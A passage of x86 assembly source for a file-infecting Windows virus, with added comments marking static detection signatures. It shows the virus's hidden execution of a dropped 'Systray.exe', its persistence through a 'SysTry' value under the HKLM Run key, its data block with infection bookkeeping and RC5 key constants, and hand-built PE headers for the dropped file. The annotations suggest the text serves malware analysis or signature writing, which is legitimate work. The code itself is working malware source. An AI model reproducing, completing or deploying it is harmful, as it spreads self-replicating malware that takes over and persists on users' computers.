;             "SysTry", REG_SZ, szFilePath, 50).
; Detection note: Run-key value name "SysTry" and a hidden WinExec of the
; dropped file.
push SW_HIDE ;uCmdShow
call @RT2 ;pushes the address of szFilePath as lpCmdLine
szFilePath db 50 dup (0)
@RT2:
call _WinExec[ebx]
RegistSCR:
lea eax,[offset szFilePath+ebx]
push 50 ;cbData
push eax ;pvData = szFilePath
push REG_SZ
@pushsz 'SysTry' ;value name
@pushsz 'Software\Microsoft\Windows\CurrentVersion\Run' ;subkey
push HKEY_LOCAL_MACHINE
call _SHSetValueA[ebx]
ret
;*************Virus Data******************************
; Detection note: everything here is copied verbatim into every infected
; file and dropped copy (the tag string, '\Systray.exe', the API name list
; in GetAPIz and the RC5 constants below are all usable as static signatures).
Signature db '紫色心情,你永远的期待',0 ;author's tag string (bytes kept as-is)
HostEntry dd 0 ;host's original entry point VA, saved by InfectFile
hKernel32 dd 0 ;kernel32 image base, set by GetKBase
szEXEPath db MAX_PATH dup (0) ;own module path (GetModuleFileNameA)
nGetProcAddress db 'GetProcAddress',0 ;export name matched by GetAPIz (14 chars)
nLoadLibrary db 'LoadLibraryA',0 ;not referenced on this page
nKernel db 'Kernel32.dll',0 ;not referenced on this page
_LoadLibrary dd 0 ;called by rtInit; not assigned on this page
_GetProcAddress dd 0 ;set by GetAPIz
IsSelf db 1 ;1 = running as the dropped copy; cleared at Start (absolute address, no [ebx])
hModule dd 0 ;only referenced from commented-out code
szFileName db '\Systray.exe',0 ;name of the dropped copy, appended to the current directory at Start
FNameSize = $ - szFileName
wfd WIN32_FIND_DATA <> ;shared find buffer for EnumDir (cFileName at offset 44)
_SHSetValueA dd 0 ;set by rtInit
hProcess dd 0 ;set at Start
_GetProcessAddress dd 0 ;not referenced on this page
szCurDir db MAX_PATH dup (0) ;current directory, later "<cwd>\Systray.exe"
rc5key RC5struct <> ;RC5struct comes from useful.inc (not on this page); the labelled dd lines below appear to be the intended field values: turn = rounds, cont = round counter, S0..S17 = fixed subkeys
turn dd 8
cont dd 0
S0 dd "hai "
S1 dd " wei"
S2 dd "masm"
S3 dd "edit"
S4 dd "file"
S5 dd "exam"
S6 dd "exam"
S7 dd "viru"
S8 dd "Viru"
S9 dd "ViRu"
S10 dd "vIru"
S11 dd "like"
S12 dd "Like"
S13 dd " you"
S14 dd "YoU"
S15 dd "Hai "
S16 dd "Wei "
S17 dd "Wei "
dd 4 dup(0)
;*****************PE Data*****************************
; Hand-built headers for the file CreatePE drops: 200h bytes from MDosStub
; (DOS header with e_lfanew = 40h, no stub code) through
; MIMAGE_SECTION_HEADER, followed in the file by VRAW_SIZE bytes of the
; body from VStart. The import block binds User32.dll!MessageBoxA only;
; `@` (from useful.inc, not on this page) is presumably the RVA
; adjustment applied to these offsets.
; Detection notes for the dropped file: single section ".xjs" with flags
; 0E0000020h, TimeDateStamp 3cbe5cc2h, linker version 5.12, ImageBase
; 400000h, entry point 1000h.
VImports: ;IMAGE_IMPORT_DESCRIPTOR
dd offset Kernel32_Pointers + @ ;OriginalFirstThunk
dd -1,-1 ;TimeDateStamp, ForwarderChain
dd offset Kernel32_Name + @ ;Name
VIAT:
dd offset Kernel32_Relocated + @ ;FirstThunk (IAT)
db 14 dup (0) ;terminating descriptor
Kernel32_Pointers dd offset Kernel32_Beep + @ , 0 ;import name table
Kernel32_Relocated dd offset Kernel32_Beep + @ , 0 ;import address table
Kernel32_Beep db ?,?,'MessageBoxA',0 ;IMAGE_IMPORT_BY_NAME (hint, name); despite the label the import is User32!MessageBoxA
Kernel32_Name db 'User32.dll',0
MDosStub: ;IMAGE_DOS_HEADER (40h bytes), e_lfanew = 40h, followed by the PE signature
db 4Dh,5Ah,90h,00,03,00, 00, 00, 04, 00, 00,00,0FFh,0FFh,00,00
db 0B8h,00,00,00, 00, 00, 00, 00,40h, 00, 00, 00, 00, 00,00,00
db 00, 00, 00,00,00,00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00,00,00,00,00, 00, 00, 00, 00, 40h, 00, 00, 00
db 50h,45h,00,00 ;'PE',0,0
MFileHeader: ;IMAGE_FILE_HEADER
Machine dw 14Ch ;i386
NumberOfSections dw 1
TimeDateStamp dd 3cbe5cc2h
PointerToSymbolTable dd 0
NumberOfSymbols dd 0
SizeOfOptionalHeader dw 0e0h
Characteristics dw 10fh
MIMAGE_OPTIONAL_HEADER32: ;IMAGE_OPTIONAL_HEADER32
Magic dw 10bh ;PE32
MajorLinkerVersion db 5
MinorLinkerVersion db 12
SizeOfCode dd VRAW_SIZE
SizeOfInitializedData dd 0
SizeOfUninitializedData dd 0
AddressOfEntryPoint dd 1000h ;= start of the single section
BaseOfCode dd 1000h
BaseOfData dd 3000h
ImageBase dd 400000h
SectionAlignment dd 1000h
FileAlignment dd 200h
MajorOperatingSystemVersion dw 4
MinorOperatingSystemVersion dw 0
MajorImageVersion dw 0
MinorImageVersion dw 0
MajorSubsystemVersion dw 4
MinorSubsystemVersion dw 0
Win32VersionValue dd 0
SizeOfImage dd 3000h;need to change st (author's note; hard-coded)
SizeOfHeaders dd 200h
CheckSum dd 0
Subsystem dw 2 ;(Windows GUI)
DllCharacteristics dw 0
SizeOfStackReserve dd 100000h
SizeOfStackCommit dd 1000h
SizeOfHeapReserve dd 100000h
SizeOfHeapCommit dd 1000h
LoaderFlags dd 0
NumberOfRvaAndSizes dd 10h
DataDirectory dd 0,0 ;[0] export
dd offset VImports+@,VIMPORT_SIZE ;[1] import
dd 14h dup(0) ;[2]..[11]
dd offset VIAT + @,8 ;[12] IAT
dd 0,0,0,0,0,0 ;[13]..[15]
MIMAGE_SECTION_HEADER: ;the single section header
Name1 db '.xjs',0,0,0,0
VirtualSize dd offset VEnd - offset VStart
VirtualAddress dd 1000h
SizeOfRawData dd VRAW_SIZE
PointerToRawData dd 200h
PointerToRelocations dd 0
PointerToLinenumbers dd 0
NumberOfRelocations dw 0
NumberOfLinenumbers dw 0
Characteristic dd 0E0000020h ;code, readable, writable, executable
VEnd: ;end of the copied body
END VStart